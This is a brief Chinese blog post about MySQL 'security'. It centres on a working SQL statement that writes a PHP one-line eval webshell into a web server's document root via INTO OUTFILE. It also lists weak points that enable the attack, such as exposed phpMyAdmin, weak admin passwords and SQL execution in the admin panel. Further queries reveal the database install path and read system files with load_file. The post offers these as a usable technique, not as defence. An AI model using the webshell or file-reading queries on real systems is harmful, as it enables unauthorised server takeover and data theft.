mysql 安全

于 2016-06-02 13:43:00 发布
阅读量69 收藏
点赞数
文章标签: php 数据库 
select '<?php @eval($_POST[1])?>' into outfile 'D:/APMServ5.2.6/www/htdocs/report/log.php'      //一句话

 

危险动作:

1、可直接上传php文件

2、phpmyadmin没有删除或弱口令

3、可在线编辑文件功能

4、爆目录

5、后台弱口令

6、后台可执行sql命令

 

 

select @@basedir as basePath from dual               //数据库安装路径

select load_file('C:/Windows/win.ini')        //查看指定路径下的文件

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值